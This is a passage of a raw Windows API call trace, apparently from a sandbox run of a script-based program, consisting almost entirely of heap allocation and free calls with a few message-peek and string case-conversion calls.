1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.954] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.954] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0185.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0185.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0185.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0185.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.959] 